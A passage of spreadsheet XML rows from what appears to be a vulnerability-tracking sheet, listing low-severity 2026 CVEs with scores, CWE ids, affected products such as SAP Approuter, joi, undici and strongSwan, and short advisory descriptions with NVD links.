      <c r="I5777" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5777" s="5" t="inlineStr"/>
      <c r="K5777" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L5777" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently validate tenant context in inbound requests. An unauthenticated attacker could send specially crafted requests to spoof the tenant context under conditions not fully within their control. Successful exploitation could allow limited access to another tenant's information, resulting in a low impact on confidentiality. There is no impact on integrity and availability.</t>
        </is>
      </c>
      <c r="M5777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58239</t>
        </is>
      </c>
    </row>
    <row r="5778">
      <c r="A5778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66774</t>
        </is>
      </c>
      <c r="C5778" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5778" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5778" s="5" t="inlineStr"/>
      <c r="F5778" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5778" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5778" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I5778" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5778" s="5" t="inlineStr"/>
      <c r="K5778" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L5778" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not consistently handle certain error conditions. An attacker with low privileges could exploit this under a non-default configuration. Successful exploitation is highly complex, as it depends on conditions outside the attacker's control. This could result in a low impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M5778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66774</t>
        </is>
      </c>
    </row>
    <row r="5779">
      <c r="A5779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71849</t>
        </is>
      </c>
      <c r="C5779" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5779" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5779" s="5" t="inlineStr"/>
      <c r="F5779" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5779" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5779" s="5" t="inlineStr"/>
      <c r="I5779" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5779" s="5" t="inlineStr"/>
      <c r="K5779" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5779" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 4.7.0 to 4.12.33, the Proxy Helper proxy() function in hono/proxy does not remove response headers named by the origin's Connection header. Per RFC 9110 Section 7.6.1, an intermediary must remove the header fields listed in a message's Connection header field before forwarding the message, in addition to the well known hop by hop headers, but the proxy() function only removed the well known hop by hop headers, including Connection itself, from origin responses. A client may therefore receive response headers that the origin intended only for its immediate peer, disclosing connection scoped or internal metadata contained in such headers, when an application proxies responses from an origin that declares additional, non standard headers as hop by hop via the Connection response header. This issue is fixed in version 4.12.34.</t>
        </is>
      </c>
      <c r="M5779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71849</t>
        </is>
      </c>
    </row>
    <row r="5780">
      <c r="A5780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73425</t>
        </is>
      </c>
      <c r="C5780" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5780" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5780" s="5" t="inlineStr"/>
      <c r="F5780" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5780" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H5780" s="5" t="inlineStr"/>
      <c r="I5780" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5780" s="5" t="inlineStr"/>
      <c r="K5780" s="5" t="inlineStr">
        <is>
          <t>CWE-185</t>
        </is>
      </c>
      <c r="L5780" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. Prior to 8.1.2, the Astro Netlify adapter converts each image.remotePatterns entry into a regular expression written to .netlify/v1/config.json under images.remote_images for Netlify's Image CDN allowlist. In packages/integrations/netlify/src/index.ts, remotePatternToRegex() escapes dots in hostname values but interpolates literal pathname values without escaping regular expression metacharacters such as ., +, ?, (, and [, so a restrictive pathname such as /img/v1.0/file also matches metacharacter-adjacent paths, including paths that cross a segment. Netlify enforces the generated regular expression directly and Astro's matchPattern() helper does not revalidate the request, allowing optimization of images on an already-allowed host that the declared pathname was intended to exclude. This issue is fixed in version 8.1.2.</t>
        </is>
      </c>
      <c r="M5780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73425</t>
        </is>
      </c>
    </row>
    <row r="5781">
      <c r="A5781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78124</t>
        </is>
      </c>
      <c r="C5781" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5781" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5781" s="5" t="inlineStr"/>
      <c r="F5781" s="5" t="inlineStr"/>
      <c r="G5781" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H5781" s="5" t="inlineStr"/>
      <c r="I5781" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5781" s="5" t="inlineStr"/>
      <c r="K5781" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L5781" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.0.2 through 6.0.7 allows PKCS#7 certificate enumeration in the openssl plugin that leads to a lack of release of memory after its effective lifetime.</t>
        </is>
      </c>
      <c r="M5781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78124</t>
        </is>
      </c>
    </row>
    <row r="5782">
      <c r="A5782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78127</t>
        </is>
      </c>
      <c r="C5782" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5782" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5782" s="5" t="inlineStr"/>
      <c r="F5782" s="5" t="inlineStr"/>
      <c r="G5782" s="5" t="inlineStr"/>
      <c r="H5782" s="5" t="inlineStr"/>
      <c r="I5782" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5782" s="5" t="inlineStr"/>
      <c r="K5782" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L5782" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 4.1.2 through 6.0.7 has a missing release of memory after its effective lifetime in the IKE message parser.</t>
        </is>
      </c>
      <c r="M5782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78127</t>
        </is>
      </c>
    </row>
    <row r="5783">
      <c r="A5783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78131</t>
        </is>
      </c>
      <c r="C5783" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5783" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5783" s="5" t="inlineStr"/>
      <c r="F5783" s="5" t="inlineStr"/>
      <c r="G5783" s="5" t="inlineStr"/>
      <c r="H5783" s="5" t="inlineStr"/>
      <c r="I5783" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5783" s="5" t="inlineStr"/>
      <c r="K5783" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L5783" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.2.0 through 6.0.7 has a missing release of memory after its effective lifetime in the x509 plugin's attribute certificate parser.</t>
        </is>
      </c>
      <c r="M5783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78131</t>
        </is>
      </c>
    </row>
    <row r="5784">
      <c r="A5784" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79690</t>
        </is>
      </c>
      <c r="C5784" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5784" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5784" s="5" t="inlineStr"/>
      <c r="F5784" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5784" s="5" t="inlineStr"/>
      <c r="H5784" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5784" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5784" s="5" t="inlineStr"/>
      <c r="K5784" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5784"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5784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79690</t>
        </is>
      </c>
    </row>
    <row r="5785">
      <c r="A5785" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79729</t>
        </is>
      </c>
      <c r="C5785" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5785" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5785" s="5" t="inlineStr"/>
      <c r="F5785" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5785" s="5" t="inlineStr"/>
      <c r="H5785" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5785" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5785" s="5" t="inlineStr"/>
      <c r="K5785" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5785"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5785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79729</t>
        </is>
      </c>
    </row>
    <row r="5786">
      <c r="A5786" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79732</t>
        </is>
      </c>
      <c r="C5786" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5786" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5786" s="5" t="inlineStr"/>
      <c r="F5786" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5786" s="5" t="inlineStr"/>
      <c r="H5786" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5786" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5786" s="5" t="inlineStr"/>
      <c r="K5786" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5786" s="5" t="inlineStr">
        <is>
          <t>Dell Secure Connect Gateway (SCG) 5.0 Appliance, versions prior to 5.36.00.xx, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M5786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79732</t>
        </is>
      </c>
    </row>
    <row r="5787">
      <c r="A5787" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79736</t>
        </is>
      </c>
      <c r="C5787" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5787" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5787" s="5" t="inlineStr"/>
      <c r="F5787" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5787" s="5" t="inlineStr"/>
      <c r="H5787" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5787" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5787" s="5" t="inlineStr"/>
      <c r="K5787" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5787"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5787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79736</t>
        </is>
      </c>
    </row>
    <row r="5788">
      <c r="A5788" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81168</t>
        </is>
      </c>
      <c r="C5788" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5788" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5788" s="5" t="inlineStr"/>
      <c r="F5788" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5788" s="5" t="inlineStr"/>
      <c r="H5788" s="5" t="inlineStr">
        <is>
          <t>captcha_protected_page_project:captcha_protected_page</t>
        </is>
      </c>
      <c r="I5788" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5788" s="5" t="inlineStr"/>
      <c r="K5788" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L5788" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal CAPTCHA Protected Page allows Functionality Bypass. This issue affects CAPTCHA Protected Page versions: from 0.0.0 to 1.0.2.</t>
        </is>
      </c>
      <c r="M5788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81168</t>
        </is>
      </c>
    </row>
    <row r="5789">
      <c r="A5789" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81348</t>
        </is>
      </c>
      <c r="C5789" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5789" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5789" s="5" t="inlineStr"/>
      <c r="F5789" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5789" s="5" t="inlineStr"/>
      <c r="H5789" s="5" t="inlineStr"/>
      <c r="I5789" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5789" s="5" t="inlineStr"/>
      <c r="K5789" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5789" s="5" t="inlineStr">
        <is>
          <t>The My Private Site  WordPress plugin before 4.2.3 does not apply its site-privacy access control to certain unauthenticated front-end read surfaces, allowing unauthenticated users to view post content, comments and post URLs from a site the administrator placed behind mandatory login.</t>
        </is>
      </c>
      <c r="M5789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81348</t>
        </is>
      </c>
    </row>
    <row r="5790">
      <c r="A5790" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84307</t>
        </is>
      </c>
      <c r="C5790" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5790" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5790" s="5" t="inlineStr"/>
      <c r="F5790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5790" s="5" t="inlineStr"/>
      <c r="H5790" s="5" t="inlineStr"/>
      <c r="I5790" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5790" s="5" t="inlineStr"/>
      <c r="K5790" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L5790" s="5" t="inlineStr">
        <is>
          <t>Filament is a collection of full-stack components for accelerated Laravel development. From 4.0.0 until 4.12.5 and 5.7.5, packages/panels/src/Auth/Pages/Login.php presents the multi-factor authentication challenge before evaluating canAccessPanel(). For an account that canAccessPanel() denies, submitting the correct password renders the MFA challenge while an incorrect password returns the generic authentication failure, allowing an unauthenticated attacker to confirm whether a candidate password is valid for that account. When email-based MFA is configured, the correct-password path also sends a login code to the account holder. The issue applies only to accounts that have MFA enabled and are denied panel access. Authentication is not bypassed because canAccessPanel() still runs after the challenge, and no session is created. This issue is fixed in versions 4.12.5 and 5.7.5.</t>
        </is>
      </c>
      <c r="M5790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84307</t>
        </is>
      </c>
    </row>
    <row r="5791">
      <c r="A5791" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84367</t>
        </is>
      </c>
      <c r="C5791" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5791" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5791" s="5" t="inlineStr"/>
      <c r="F5791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5791" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5791" s="5" t="inlineStr"/>
      <c r="I5791" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5791" s="5" t="inlineStr"/>
      <c r="K5791" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L5791" s="5" t="inlineStr">
        <is>
          <t>joi is a schema description language and data validator for JavaScript. From 16.0.0 until 17.13.5 and 18.2.4, joi's lib/types/keys.js internals.rename() implementation used by object().rename() permits a schema that renames keys with a regular-expression source and a Joi.expression() or Joi.x() target that interpolates the pattern's own match data, combined with { multiple: true }, to derive a target from an attacker-controlled input key. An attacker can send x-__proto__ with an object value, causing the target to render as __proto__ and set the prototype of the object returned by validate() instead of creating an own key. The global Object.prototype is not modified, so the effect is confined to the object returned by that validation call. Static-string targets and schemas using the default { multiple: false } are not affected. This issue is fixed in versions 17.13.5 and 18.2.4.</t>
        </is>
      </c>
      <c r="M5791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t>
        </is>
      </c>
    </row>
    <row r="5792">
      <c r="A5792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84368</t>
        </is>
      </c>
      <c r="C5792" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5792" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5792" s="5" t="inlineStr"/>
      <c r="F5792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5792" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5792" s="5" t="inlineStr"/>
      <c r="I5792" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5792" s="5" t="inlineStr"/>
      <c r="K5792" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L5792" s="5" t="inlineStr">
        <is>
          <t>joi is a schema description language and data validator for JavaScript. From 16.0.0 until 17.13.6 and 18.2.5, the @hapi/joi package through 17.1.1 and the successor joi package contain prototype pollution in lib/messages.js, where exports.compile() and exports.merge() reuse inherited objects for attacker-controlled language keys supplied through messages(), message(), prefs({ messages }), Joi.extend({ messages }), or rule({ message }). A language key named __proto__ writes properties onto Object.prototype, and constructor writes to the Object function's static properties. A consuming application that gates on the presence of an inherited property can take the wrong branch for every inspected object. The flaw is not reachable from data that joi validates and requires an application to feed untrusted input directly into schema-construction configuration. This issue is fixed in joi versions 17.13.6 and 18.2.5; no fixed @hapi/joi version is available.</t>
        </is>
      </c>
      <c r="M5792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t>
        </is>
      </c>
    </row>
    <row r="5793">
      <c r="A5793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84947</t>
        </is>
      </c>
      <c r="C5793" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5793" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5793" s="5" t="inlineStr"/>
      <c r="F5793" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5793" s="5" t="inlineStr"/>
      <c r="H5793" s="5" t="inlineStr"/>
      <c r="I5793" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5793" s="5" t="inlineStr"/>
      <c r="K5793" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-248</t>
        </is>
      </c>
      <c r="L5793" s="5" t="inlineStr">
        <is>
          <t>undici's dump interceptor reads and discards a response body up to a configurable maximum size. When a response declares a Content-Length that exceeds the maximum, the interceptor aborts cleanly, but when a response has no Content-Length and is chunked, the interceptor instead signals completion early once the accumulated size reaches the maximum, without pausing or aborting the request. Because the underlying parser keeps delivering body bytes, a second completion signal fires and trips an internal assertion, which aborts the request and tears down the connection. The application is left observing a misleading successful status with an empty or truncated body while the connection has actually been disconnected. This affects undici versions from 7.1.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M5793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84947</t>
        </is>
      </c>
    </row>
    <row r="5794">
      <c r="A5794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85008</t>
        </is>
      </c>
      <c r="C5794" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5794" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5794" s="5" t="inlineStr"/>
      <c r="F5794" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5794" s="5" t="inlineStr"/>
      <c r="H5794" s="5" t="inlineStr"/>
      <c r="I5794" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5794" s="5" t="inlineStr"/>
      <c r="K5794" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L5794" s="5" t="inlineStr">
        <is>
          <t>undici's cache interceptor documents that only safe HTTP methods are cached, but its logic to skip caching is built by subtracting the configured methods from the set of safe methods, so an unsafe method such as POST, PUT, or DELETE is never placed in the skip list and instead falls through to the full cache-read path. The response-storage gate also lacked a method check, so a response to an unsafe request that is heuristically cacheable or carries an explicit Cache-Control directive is stored and later replayed from cache. Because response headers from a remote origin are untrusted, an origin can answer once with a cacheable status and then have the client's own subsequent state-changing requests to that path served from the stale cache entry without ever reaching the origin, an integrity failure that occurs under the interceptor's default configuration. This affects undici versions from 7.0.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M5794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85008</t>
        </is>
      </c>
    </row>
    <row r="5795">
      <c r="A5795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86486</t>
        </is>
      </c>
      <c r="C5795" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5795" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5795" s="5" t="inlineStr"/>
      <c r="F5795" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5795" s="5" t="inlineStr"/>
      <c r="H5795" s="5" t="inlineStr"/>
      <c r="I5795" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5795" s="5" t="inlineStr"/>
      <c r="K5795" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L5795" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 the generic VCS webhook handler failed open when its secret was blank</t>
        </is>
      </c>
      <c r="M5795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86486</t>
        </is>
      </c>
    </row>
    <row r="5796">
      <c r="A5796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88013</t>
        </is>
      </c>
      <c r="C5796" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5796" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5796" s="5" t="inlineStr"/>
      <c r="F5796" s="5" t="inlineStr"/>
      <c r="G5796" s="5" t="inlineStr"/>
      <c r="H5796" s="5" t="inlineStr"/>
      <c r="I5796" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5796" s="5" t="inlineStr"/>
      <c r="K5796" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="L5796" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From 1.49.0 until 1.75.1, the HTTP backend attaches headers configured through --http-headers or headers= to requests in backend/http/http.go, while its fshttp.NewClient client follows redirects without a backend-specific http.Client.CheckRedirect policy. A configured remote that redirects to another host can therefore cause custom secrets such as X-Api-Key to be resent to that untrusted destination, and a same-host HTTPS-to-HTTP redirect can expose Authorization or Cookie headers in cleartext. Listing, stat, download, mount, and serve operations can trigger the leak during normal use. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M5796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88013</t>
        </is>
      </c>
    </row>
    <row r="5797">
      <c r="A5797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89160</t>
        </is>
      </c>
      <c r="C5797" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5797" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5797" s="5" t="inlineStr"/>
      <c r="F5797" s="5" t="inlineStr"/>
      <c r="G5797" s="5" t="inlineStr"/>
      <c r="H5797" s="5" t="inlineStr"/>
      <c r="I5797" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5797" s="5" t="inlineStr"/>
      <c r="K5797" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5797" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 has a pcre2_match out-of-bounds read during the PCRE2_MATCH_INVALID_UTF matching of an invalid UTF subject.</t>
        </is>
      </c>
      <c r="M5797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89160</t>
        </is>
      </c>
    </row>
    <row r="5798">
      <c r="A5798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5798" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15694</t>
        </is>
      </c>
      <c r="C5798" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D5798" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5798" s="5" t="inlineStr"/>
      <c r="F5798" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5798" s="5" t="inlineStr"/>
      <c r="H5798" s="5" t="inlineStr"/>
      <c r="I5798" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5798" s="5" t="inlineStr"/>
